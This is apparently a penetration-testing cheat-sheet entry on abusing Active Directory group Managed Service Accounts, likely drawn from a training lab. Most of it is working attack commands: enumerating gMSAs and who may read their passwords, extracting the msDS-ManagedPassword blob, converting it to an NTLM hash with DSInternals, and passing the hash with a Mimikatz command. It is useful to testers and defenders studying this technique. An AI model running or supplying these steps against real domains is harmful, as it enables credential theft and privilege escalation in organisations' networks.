gmsa

Provides password management, password rotation (every 30 days), and management of SPNs and delegated administration for service accounts and helps protect against Kerberoast attacks

Can potentially read the gMSA password from the msds-ManagedPassword attribute (stored in binary form of MSDS-MANAGEDPASSWORD_BLOB). Must be explicitly allowed to do so (not even Domain Admins can read this by default)

Powershell

Find managed service accounts

Get-DomainObject -LDAPFilter '(objectClass=msDS-GroupManagedServiceAccount)'

Get-ADServiceAccount -Filter *

Get users that can read the msds-ManagedPassword attributeusing ADModule

Get-ADServiceAccount -Identity gmsa_account -Properties * | select PrincipalsAllowedToRetrieveManagedPassword

Read the blob

Once we have compromised a principal that can read the blob. Use ADModule to read and DSInternals to compute NTLM hash:

$Passwordblob = (Get-ADServiceAccount -Identity jumpone -Properties msDS-ManagedPassword).'msDS-ManagedPassword'

Convert the password to NTLM hash: https://github.com/MichaelGrafnetter/DSInternals/releases

Import-Module \DSInternals\DSInternals.psd1
$decodedpwd = ConvertFrom-ADManagedPasswordBlob $Passwordblob
ConvertTo-NTHash -Password $decodedpwd.SecureCurrentPassword

Passing the NTLM hash of the gMSA, we get privileges of the gMSA.

sekurlsa::pth /user:jumpone /domain:us.techcorp.local /ntlm:0a02c684cc0fa1744195edd1aec43078